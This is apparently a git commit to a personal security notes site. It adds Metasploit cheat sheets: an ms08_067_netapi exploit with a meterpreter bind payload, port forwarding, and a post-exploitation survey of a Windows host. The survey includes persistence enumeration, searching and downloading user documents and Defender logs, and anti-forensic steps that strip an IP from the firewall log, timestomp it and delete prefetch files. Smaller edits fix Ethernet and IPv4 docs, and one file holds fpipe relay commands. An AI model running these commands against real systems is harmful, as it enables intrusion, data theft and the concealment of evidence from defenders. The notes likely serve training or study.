Commit 46ad53e

bryfry <bryon.fryer@gmail.com>
2017-02-16 10:28:46
dump update
master
1 parent b804127
Changed files (8)
msf
meta
index.md
meterpreter.md
survey.md
networking
protocols
ethernet.md
index.md
ipv4.md
windows
meta
survey.md
misc
fpipe
msf/meta/index.md
@@ -0,0 +1,8 @@
+---
+date: "2017-02-15"
+draft: false
+title: "Metasploit Meta"
+
+---
+
+* [survey]({{< relref "msf/meta/survey.md" >}})
msf/meta/meterpreter.md
@@ -0,0 +1,37 @@
+---
+date: "2017-02-15"
+draft: false
+title: "Meterpreter"
+
+---
+
+
+
+# Port Forwards
+
+ * `meterpreter >` `portfwd add -L <LOCALIP> -l <LOCALPORT> -p <REMOTEPORT> -r <REMOTEIP>`
+
+
+
+# Examples: 
+
+0. `ms08_067_netapi` + Bind TCP
+
+  * Exploit
+      * `>` `use exploit/windows/smb/ms08_067_netapi`
+      * `>` `set payload windows/meterpreter/bind_tcp`
+      * `>` `set RHOST <REMOTE IP>`
+      * `>` `set RPORT <REMOTE PORT>`
+      * `>` `set LPORT <RANDOM HIGH PORT X>`
+      * `>` `set DisablePayloadHandler true`
+      * `>` `show options`
+      * `>` `exploit -z -j`
+  * Bind to target
+      * `>` `use exploit/multi/handler`
+      * `>` `set payload windows/meterpreter/bind_tcp`
+      * `>` `set LPORT <RANDOM HIGH PORT X>`
+      * `>` `set RHOST <REMOTE IP>`
+      * `>` `show options`
+      * `>` `exploit`
+
+
msf/meta/survey.md
@@ -0,0 +1,87 @@
+---
+date: "2017-02-15"
+draft: false
+title: "Meterpreter Survey - Windows"
+
+---
+
+
+# Init 
+0. **Situational Awareness**
+
+  * `getuid`  *`# Get the meterpreter current User Id`*
+  * `getpid`  *`# Get the meterpreter current PID`*
+  * `ipconfig` *`# Host Name, IP Address`*
+	* `sysinfo` *`# Get the hostname, OS, and architecture of the system`*
+	* `ps` *`# Get a list of the currently running processes and check current meterpreter process PID`*
+	* `netstat` *`# Get a list of the current connections and listening ports`*
+	* `cd c:\\windows\\temp\\` *`# Change directory to have predictable File System interactions`*
+  * `pwd` 
+  * `ls`
+
+0. **System Date/Time**
+
+  * `run wmic -c "timezone list brief"` *`# Get the current time zone`* 
+  * `run wmic -c "os get localdatetime"` *`# Get the current time`*
+
+0. **Security and Settings**
+  * `run get_env` *`# Show system environment variables`*
+  * `run getcountermeasure` *`# Determine if firewall is enabled`*
+  * `run multicommand -cl "at","schtasks /query"` *`# List scheduled tasks`*
+  * `run wmic -c "startup list"` *`# Get a list of the applications that are set to launch at startup`*
+  * `run multicommand -cl "netsh firewall show logging"`	*`# Determine if the built-in firewall has logging enabled or disabled`*
+  * `run event_manager -i` *`# Show which Windows event logs are available`*
+
+# Users and Domains 
+
+0. **Users**
+run wmic -c "netlogin get name,lastlogon,badpasswordcount"
+													Password Settings
+
+# Software
+
+0. **Enumerate Persistance Vectors**
+
+  * `reg enumkey -k "HKLM\\software\\microsoft\\windows\\currentversion\\run"`
+  * `reg enumkey -k "HKCU\\software\\microsoft\\windows\\currentversion\\runonce"`
+  * `reg enumkey -k "HKLM\\software\\microsoft\\windows\\currentversion\\run"`
+  * `reg enumkey -k "HKCU\\software\\microsoft\\windows\\currentversion\\runonce"`
+	* `reg queryval - k "HKLM\\software\\microsoft\\windows\\currentversion\\winlogon" -v "shell"`
+
+0. **Windows firewall log cleaning**
+
+  * `run multicommand -cl "findstr \"<IP ADDRESS>\" c:\\windows\\pfirewall.log"`
+	* `run multicommand -cl "cmd /c findstr /v \"<IP ADDRESS>\" c:\\windows\\pfirewall.log > c:\\temp\\pfirewall.log"`
+	* `timestomp pfirewall.log -z "MM/DD/YYYY HH:mm:ss"`
+
+0. Defender / Security Essentials
+
+reg queryval -k "HKLM\\Software\\Microsoft\\Windows Defender\\spynet" -v spynetreporting													
+
+0. Dr. Watson
+
+# Networking
+
+reg queryval -k "HKCU\\software\\microsoft\\windows\\currentversion\\internet settings" -v ProxyEnable
+reg queryval -k "HKCU\\software\\microsoft\\windows\\currentversion\\internet settings" -v ProxyServer													
+
+0. Local Area Networks
+
+run netenum -ps -r 172.17.20.200-172.17.20.230 		Pingsweeep of network range
+ run multicommand -cl "ping -n 2 <Target 2 IP>" 
+
+
+# Doucments and File System interactions
+search -r -d C:\\Users\\ -f *.doc					Using Meterpreter's built-in functionality, determine whether any files with a .doc extension are present on the system. Limit your search to just the user's directories.
+													Using Meterpreter's built-in functionality, search for any .log files related to Windows Defender.
+search -d "C:\\ProgamData\\Microsoft\\Windows Defender\\" -f *.log -r
+													Download to your /tmp directory the logs from the Windows Defender\Scans\History\Service subdirectory.
+download -r "C:\\ProgamData\\Microsoft\\Windows Defender\\scans\\history\\service\\" "/tmp/"
+													Using Meterpreter's built-in functionality, get a list of the registry values under the System run key.
+run multicommand -cl "cmd /c dir /o:d /t:w"			Change to the prefetch directory and get a list of directory contents, sorted oldest to newest by write time.
+													remove prefetch files that you created (post exploit)
+
+
+# Cleanup
+
+Prefetch Directory
networking/protocols/ethernet.md
@@ -7,7 +7,7 @@ title: "Ethernet"
 
 Systems communicating over Ethernet divide a stream of data into shorter pieces called frames. Each frame contains source and destination MAC addresses, and error-checking data so that damaged frames can be detected and discarded; most often, higher-layer protocols trigger retransmission of lost frames. As per the OSI model, Ethernet provides services up to and including the data link layer.[1]
 
-## PN Headers
+## Ethernet Headers
 
 ```    
                           1   	 
@@ -18,7 +18,7 @@ byte  0 1 2 3 4 5 6 7 8 9 0 1 2 3 4
      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-....   A   .-+-+-+-+-+
 ```
 
-## PN Header Descriptions
+## Ethernet Header Descriptions
 
 | Bytes                    | Name                         | Description                                                          |
 |--------------------------|------------------------------|----------------------------------------------------------------------|
@@ -26,9 +26,6 @@ byte  0 1 2 3 4 5 6 7 8 9 0 1 2 3 4
 | `ether[6:4], ether[8:2]` | Src MAC Address              |                                                                      |
 | `ether[12:2]`            | [EtherType](./ether_type.md) | indicates which protocol is encapsulated in the payload of the frame |
 
-- bytes are in bpf filter notation
-- name is usually the abbreviated name
-- description usulally has the full name and a short description
 
 ## Additional resources
networking/protocols/index.md
@@ -7,9 +7,9 @@ title: "Networking"
 
 ## Protocols
 
-* [Ethernet]({{< relref "negttworking/protocols/ethernet.md" >}})
+* [Ethernet]({{< relref "networking/protocols/ethernet.md" >}})
 * [VLAN]({{< relref "networking/protocols/vlan.md" >}})
-* [IP]({{< relref "networking/protocols/ipv4.md" >}})
+* [IP]({{< relref   "networking/protocols/ipv4.md" >}})
 * [TCP]({{< relref "networking/protocols/tcp.md" >}})
 * [UDP]({{< relref "networking/protocols/udp.md" >}})
 * [ARP]({{< relref "networking/protocols/arp.md" >}}) # TODO
networking/protocols/ipv4.md
@@ -1,6 +1,6 @@
 ---
 date:  "2016-12-01"
-draft: true
+draft: false
 title: "IPv4"
 
 ---
windows/meta/survey.md
@@ -141,7 +141,8 @@ title: "Windows Survey"
 
     All the DLLs that are specified in this value are loaded by each Microsoft Windows-based application that is running in the current log on session. (TODO: move to registry.md, link to there)
 
-0. **Enumerate Persistance**
+0. **Enumerate Persistance Vectors**
+
   * `autorunsc <-b|-l>` *`# show boot and logon auto startups `*
   * `reg query hklm\software\microsoft\windows\currentversion\run`
   * `reg query hkcu\software\microsoft\windows\currentversion\run`
windows/misc/fpipe
@@ -0,0 +1,5 @@
+
+
+fpipe -l 8080 -r 445 192.168.0.10
+fpipe -l 5353 -r 5353 198.18.30.5
+fpipe -l 4444 -r 4444 192.168.0.10